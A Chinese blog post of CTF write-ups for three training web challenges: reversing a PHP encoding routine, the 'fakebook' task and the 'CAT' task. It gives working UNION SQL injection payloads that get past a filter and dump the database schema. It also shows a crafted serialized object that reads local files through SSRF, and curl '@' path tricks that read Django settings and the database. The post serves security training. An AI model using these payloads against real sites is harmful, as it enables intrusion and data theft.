CTF_Web:攻防世界高手区进阶题WP(19-21)

已于 2024-04-06 16:50:42 修改
阅读量1.6k 收藏 2
点赞数 1
分类专栏: CTF_Web 文章标签: php web 安全 网络安全
于 2021-09-09 11:35:28 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35493457/article/details/120117470
版权

0x00 NSCTFweb2题解(19)

打开题目直接是一段代码,提示逆向即为flag,首先看代码:

<?php 
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; 

function encode($str){ 
    $_o=strrev($str); 
    // echo $_o; 
         
    for($_0=0;$_0<strlen($_o);$_0++){ 
        
        $_c=substr($_o,$_0,1); 
        $__=ord($_c)+1; 
        $_c=chr($__); 
        $_=$_.$_c;    
    }  
    return str_rot13(strrev(base64_encode($_))); 
} 

highlight_file(__FILE__); 
/* 
   逆向加密算法,解密$miwen就是flag 
*/ 
?>

从算法可以看出,最后呈现给我们的字符串是str_rot13(strrev(base64_encode($_)));,而$_for循环中挨个取值ascii码加1的结果,我们一步步逆向回去即可。
首先进行rot13解码。

$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; 
$miwen=str_rot13($miwen);

然后将字符串反转后进行base64解密。

$miwen=strrev($miwen);
$miwen1 = base64_decode($miwen);

然后逆向for循环中的语句,所有加1变减1即可,最后因为$_=$_.$_c; 是向后拼接的结果,所以要再次将字符串翻转。

for ($_0=0;$_0<strlen($miwen1);$_0++){
	$_c=substr($miwen1,$_0,1); 
	$__=ord($_c)-1; 
	$_c=chr($__); 
	$_=$_.$_c; 
}
echo strrev($_);

最终结果为flag,全部提交为正确答案。
完整代码为:

<?php 
$miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; 
$miwen=str_rot13($miwen);#rot13解码
$miwen=strrev($miwen);#字符串翻转
$miwen1 = base64_decode($miwen);#base64解码
echo $miwen1."<br/>";
$_=''; #初始化变量
for ($_0=0;$_0<strlen($miwen1);$_0++){
	$_c=substr($miwen1,$_0,1); 
	$__=ord($_c)-1; #将ascii码减1
	$_c=chr($__); #转换为字符
	$_=$_.$_c; #拼接字符
}
echo strrev($_);#再次翻转

运行结果为:

flag为:

flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

0x01 网鼎杯 2018 fakebook题解(20)

这个题目首先是需要登录后,进行查询操作,最后在查询时将字段的值反序列化得到敏感文件,是一道比较综合的题目。
首先主页显示的一个blog系统,显示用户的id、blog等信息。
当我们注册一个登录后,页面显示为:

然后username是一个链接,这里是去查询这个id的所有信息,也就是这4个字段,url为:

http://111.200.241.244:53591/view.php?no=1

输入单引号报错,说明可能存在注入漏洞

尝试注入:
这里注入点是数字型,no表示的应当是id号。
所以直接在参数后加order by即可。
经过测试共4个字段。
使用union联合查询时报错,发现过滤了union select整个语法。

使用注释符绕过一下。

-1%20union/**/select%201,2,3,4#

可以看到这个时候回显的位置已经判断出来了,username已经从1变成了2,说明我们此时查询回显的位置为2,将2中的语句替换,使用

-1%20union/**/select%201,database()3,4#
-1%20union/**/select%201,user(),3,4#
-1%20union/**/select%201,select%20group_concat(SCHEMA_NAME)%20from%20information_schema.SCHEMATA,3,4#

查询所有的数据库和当前库名、用户名。得到信息:

所有数据库为:
fakebook
information_schema
mysql
performance_schema
test 
当前库为:fakebook
当前用户为:root@localhost

使用

-1%20union/**/select%201,(select%20group_concat(TABLE_NAME)%20from%20information_schema.TABLES%20where%20TABLE_SCHEMA=%27fakebook%27),3,4#

查询fakebook库中的表为users
使用

-1%20union/**/select%201,(select%20group_concat(COLUMN_NAME)%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=%27fakebook%27%20and%20TABLE_NAME=%27users%27),3,4#

查询表中字段为:

no
username
passwd
data

可见数据库中并没有flag字段,当然要是有这个题就太基础了。
接下来就到了这个题目的第二部,源码审计,在robots.txt中发现了user.php的备份文件,下载下来查看:

<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";
    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }
    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }
    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}

代码没有反序列化的各种绕过和Pop链,只有一个解析域名的SSRF漏洞,可以通过curl_exec包含本地文件,这里通过注入查找发现data中的数据就是序列化之后的字串。

-1%20union/**/select%201,(select%20data%20from%20users%20where%201=1),3,4#

返回的data数据为:
且报错显示在反序列化时发生了错误。
尝试把查询到的数据带入4位置中,发现返回正常页面,也就是说,被查询的序列化字符串被反序列化后显示到了前面3个字段,这时我们需要构造序列化串,来读取我们需要的文件。

构造序列化串读取/var/www/html/flag.php

O:8:"UserInfo":3:{s:4:"name";s:1:"1";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

传入4的位置,使我们的字符串被序列化读取文件。
最终payload:

no=-11%20union/**/SELECT%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:1:%221%22;s:3:%22age%22;i:1;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27#

返回页面为:
得到flag:

flag{c1e552fdf77049fabf65168f22f7aeab}

0x02 WHCTF-2017 CAT题解(21)

这个题目打开之后要求输入一个域名,试试baidu.com,没什么反应。
但是url变了,增加了一个参数可以控制,url=
试试127.0.0.1,发现是一个ping命令,返回执行的结果。

但使用|管道符和;分号分割命令都不可行,都被过滤。
在这里插入图片描述其实这个题目没有什么特殊的思路,大佬们的wp也都比较简单,总的来说就是让这个框架写的后台报错,在报错信息中找到答案,当然这里首先是FUZZ了所有过滤的字符,发现只留下了@这一个字符,然后通过超出ascii码的输入使框架报错,这里使用宽字节使后台报错,输入%bf,返回错误信息。
报错信息中提示出现错误的python路径为/opt/api,在处理gbk编码时解码出现了错误,没有办法继续执行了。
这里大佬们都说对python站点使用Django框架,配置信息会存放在工作目录的setting.py中。这里php curl中有一个知识点,可以使用@加上完整的路径来传递文件,从而找到我们的敏感信息,首先使用

@/opt/api/api/settings.py

来获取数据库配置的信息,但是事实上在一开始宽字节报错时下面就有一部分setting的报错,已经将数据库的信息打印了出来,所以只需要直接去找数据库的信息即可。

这里使用

@/opt/api/database.sqlite3

在报错信息中找到flag。

flag为:

WHCTF{yoooo_Such_A_G00D_@}
星辰照耀你我
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
攻防世界web2(逆向加密算法)
weixin_45694388的博客
11-08 478
打开网页有如下代码: <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); // echo $_o; for($_0=0;$_0<strlen($_o);$_0++){ $_c=substr($_o,$_0,1); $__=o
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
概述基于Django框架开发,同时kvm虚拟化和SDN技术的使用带给了使用者强大的靶机攻防体验。开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的...
2024年最新CTF_WP-攻防世界web解,从零开始学数据结构和算法
最新发布
2401_84264536的博客
05-11 436
目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
ISCTF2023 web方向wp超详细解析+做思路(部分)
2301_76690905的博客
11-29 3746
目:提示了一句话密码为1,直接蚁剑连靶场,密码连1进去就能看见flag1根目录有flag2flag3不可能一个个点,肯定是转去虚拟终端用命令找,在开虚拟终端之前看下.sh,一般都会放些提示我们就能知道,FLAG3 包含了 FLAG 变量的从第 21 个字符到末尾的部分,可以直接在虚拟终端输出 FLAG3 变量的值那我们先进入虚拟终端,然后cd /去到根目录,然后在根目录输出FLAG3 变量的值别的命令不知道为什么不是返回不了,就是权限不够,都已经root了(?
CTFShow-WEB入门篇--信息搜集详细Wp
Aluxian_的博客
06-02 2156
CTFShow-WEB入门篇--信息搜集详细Wp
2021CTF鹤城杯挑战赛WEB-wp
qq_36410265的博客
12-27 2271
2021CTF鹤城杯挑战赛WEB部分wp
CTF_WP-攻防世界web
qq_63600223的博客
03-25 1993
目描述:想想初始页面?尝试访问index.php,没反应,返回结果一样用dirbuster扫描一下,发现果然有个index.php,并且大小跟1不一样,并且返回码是302再次尝试访问,还是不行搜索得知,302是被重定向了用burpsuit抓包发送,flag被隐藏,查看headerflag藏在报文头里备份文件搜索得知:php的备份有两种:.php~和.php.bak修改urlindex.php.bak自动下载了一个文件,打开发现flag打开链接是一个维基百科的说明,
CTF_Web_docker:CTF_Web的码头工人
05-14
CTF_Web_dockerCTF中Web和Bin最大的区别在于,一旦比赛结束,Web选手就抓瞎了,没办法复现EXP。因此,打算收集整理一些自己做的Web环境,方便复现。Enjoy it.
CTF_WEB_Training:这项工作已获CC BY-NC-SA 4.0许可
03-07
CTF_WEB_培训2021.01.31 SQL注入部分使用了Ajax以提高手工注入的体验2021.02.04 SQL注入部分基本完结,二次注入暂时没有使用Ajax,随后会补上,然后整理文件结构,再整理几个SQL注入的相关EXP,再写一下总结2021.02....
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py ...
Chr加密解密.rar
09-10
对asii码进行加密解密,小工具,双击即可使用,不需要安装
java红酒网站源码-ctf_tools:ctf_tools
06-05
java网站源码CTF工具 卜拉欣·本·阿里比亚 | 2019 年 4 月 18 日 在撰写本文时,此存储库将仅托管可能有助于解决 CTF 挑战的工具和命令列表。 我希望将其保留为“实时文档”,理想情况下它不会像我制作的旧“工具”...
BUUCTF目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 7198
BUUCTF目Misc部分wp(持续更新)
2021 长城杯ctf wp
qq_45603443的博客
09-20 4715
2021 长城杯 wpMisc签到你这flag保熟吗Cryptobaby_rsaReverseJust_cmpfunny_jsWebjava_urlez_pythonPwnK1ng_in_h3Ap_IK1ng_in_h3Ap_II Misc 签到 ASCII—16进制—base64 你这flag保熟吗 下载附件,得到两张图⽚和⼀个压缩包,压缩包需要密码 从图⽚可以提取出两个rar 得到⼀个excel和⼀个hint hint中提示base64:(,还有⼀串不知所云的base64 excel中是分开来的单
2021第五空间CTF_web_wp
meteox的博客
09-20 2196
web WebFTP 这个开始时有个1.txt直接访问,里面就有包括flag等的各种环境信息,不知道是忘删了还是有师傅导出的、、、 这个程序直接GitHub上可以找到源代码,里面有个php探针,这就可以得到各种信息了 https://github.com/wifeat/WebFTP/blob/master/Readme/mytz.php 在phpinfo中可以得到flag http://114.115.185.167:32770/Readme/mytz.php?act=phpinfo pkloveclou
ctfshow-2023愚人杯部分wp
adorkablezhenbai的博客
04-02 2279
新手web参加愚人杯
WEB入门 bugku web5
qq_42728977的博客
12-18 307
$num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } "=="绕过 php中有两种比较符号 === 会同时比较字符串的值和类型 == 会先将字符串换成相同类型,再作比较,属于弱类型比较 == 对于所有0e开头的都为相等 is_numeric() 判断变量是否为数字或数字字符串 is_numeric() 函数会判断如果是数字和数字字符串则返回 TRUE,否则返回 FALSE,且
CTF web总结
热门推荐
giantbranch的专栏
04-09 7万+
欢迎光顾我的新博客:https://www.giantbranch.cn 本文链接:http://blog.csdn.net/u012763794/article/details/50959166 本文根据自己的做经验及各大练习平台不断更新,若我最近懒了,没怎么更新,请在下面提醒我或鼓励我 仅作为自己的笔记及刚入门的童鞋,大牛勿喷 基础篇   1.直接查看源代码   http:/...
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过来绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星辰照耀你我

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值